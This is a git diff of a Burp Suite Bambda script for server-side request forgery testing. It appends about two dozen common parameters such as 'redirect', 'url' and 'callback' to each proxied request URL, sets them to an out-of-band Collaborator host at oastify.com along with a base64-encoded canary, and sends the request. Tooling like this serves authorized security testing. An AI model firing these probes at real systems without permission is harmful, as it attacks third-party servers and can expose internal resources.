working now -> ssrf_common_params.bambda

Proxy/HTTP/ssrf_common_params.bambda

@@ -5,51 +5,48 @@
  * 
  * @author Eric Labrador Sainz (https://github.com/e1abrador)
  */
-public class RequestParameterTester {
 
-    public static void main(String[] args) {
-        String collaboratorUrl = "https://xyz.oastify.com/";
+String collaboratorUrl = "https://xyz.oastify.com/";
 
-        try {
-            // Replace 'requestResponse.request().url()' with your URL
-            String originalUrl = "http://example.com"; // Placeholder for the original URL
+try {
+    // Base64 encode the original request URL
+    String encodedUrl = java.util.Base64.getEncoder().encodeToString(requestResponse.request().url().getBytes());
 
-            // Base64 encode the original URL
-            String encodedUrl = java.util.Base64.getEncoder().encodeToString(originalUrl.getBytes());
+    // Construct the canary URL using the collaborator URL and the encoded original URL
+    String canary = collaboratorUrl + encodedUrl;
 
-            // Construct the canary URL
-            String canary = collaboratorUrl + encodedUrl;
+    // Start building the test URL with the original request URL
+    StringBuilder testURLBuilder = new StringBuilder(requestResponse.request().url());
 
-            // Initialize the StringBuilder with the original URL
-            StringBuilder testURLBuilder = new StringBuilder(originalUrl);
+    // Add a '?' or '&' based on whether the original URL already contains query parameters
+    if (!testURLBuilder.toString().contains("?")) {
+        testURLBuilder.append("?");
+    } else {
+        testURLBuilder.append("&");
+    }
 
-            // Determine the initial query parameter delimiter
-            testURLBuilder.append(originalUrl.contains("?") ? "&" : "?");
+    // Add the 'base64url' parameter with the canary
+    testURLBuilder.append("base64url=").append(canary);
 
-            // Append the 'base64url' parameter
-            testURLBuilder.append("base64url=").append(canary);
+    // Additional parameters to append
+    String[] paramsToAdd = {"dest", "redirect", "uri", "path", "continue", "url", "window", "next", "data",
+                            "reference", "site", "html", "val", "validate", "domain", "callback", "return", 
+                            "page", "feed", "host", "port", "to", "out", "view", "dir", "show", "navigation", 
+                            "open"};
 
-            // Parameters to be appended
-            String[] paramsToAdd = {
-                "dest", "redirect", "uri", "path", "continue", "url", "window", "next", "data",
-                "reference", "site", "html", "val", "validate", "domain", "callback", "return", 
-                "page", "feed", "host", "port", "to", "out", "view", "dir", "show", "navigation", 
-                "open"
-            };
+    // Append the additional parameters with the collaboratorUrl as their value
+    for (String param : paramsToAdd) {
+        testURLBuilder.append("&").append(param).append("=").append(collaboratorUrl);
+    }
 
-            // Append each parameter with the collaborator URL
-            for (String param : paramsToAdd) {
-                testURLBuilder.append("&").append(param).append("=").append(collaboratorUrl);
-            }
+    // Convert the StringBuilder to a String and remove the trailing '&'
+    String testURL = testURLBuilder.toString().replaceAll("&$", "");
 
-            // Convert to String and remove the trailing '&'
-            String testURL = testURLBuilder.toString().replaceAll("&$", "");
+    // Send request
+    new java.net.URL(testURL).openStream();
 
-            // Send the GET request
-            new java.net.URL(testURL).openStream();
-
-        } catch (Exception e) {
-            System.out.println("Error: " + e.getMessage());
-        }
-    }
+} catch (Exception e) {
+    System.out.println(e.getMessage());
 }
+
+return false;